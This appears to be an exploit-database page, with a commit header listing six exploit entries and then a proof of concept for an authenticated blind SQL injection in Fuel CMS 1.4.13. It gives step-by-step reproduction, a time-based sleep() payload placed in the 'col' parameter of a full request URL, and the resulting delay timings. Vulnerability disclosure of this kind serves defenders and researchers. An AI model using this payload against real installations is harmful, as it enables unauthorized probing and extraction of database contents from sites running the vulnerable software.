412b034ee9
6 changes to exploits/shellcodes WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS) KONGA 0.14.9 - Privilege Escalation Simple Subscription Website 1.0 - SQLi Authentication Bypass Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated) WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated) PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
23 lines
No EOL
1,019 B
Text
23 lines
No EOL
1,019 B
Text
# Exploit Title: Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)
|
|
# Date: 2021-04-11
|
|
# Exploit Author: Rahad Chowdhury
|
|
# Vendor Homepage: https://www.getfuelcms.com/
|
|
# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip
|
|
# Version: 1.4.13
|
|
# Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46
|
|
|
|
Steps to Reproduce:
|
|
1. At first login your panel
|
|
2. then go to "Activity Log" menu
|
|
3. then select any type option
|
|
4. their "col" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "and (select * from(select(sleep(1)))a)" in "col=" parameter.
|
|
|
|
POC:
|
|
http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date
|
|
and (select * from(select(sleep(1)))a)&fuel_inline=0
|
|
|
|
Output:
|
|
By issuing sleep(0) response will be delayed to 0 seconds.
|
|
By issuing sleep(1) response will be delayed to 1 seconds.
|
|
By issuing sleep(5) response will be delayed to 5 seconds.
|
|
By issuing sleep(10) response will be delayed to 10 seconds |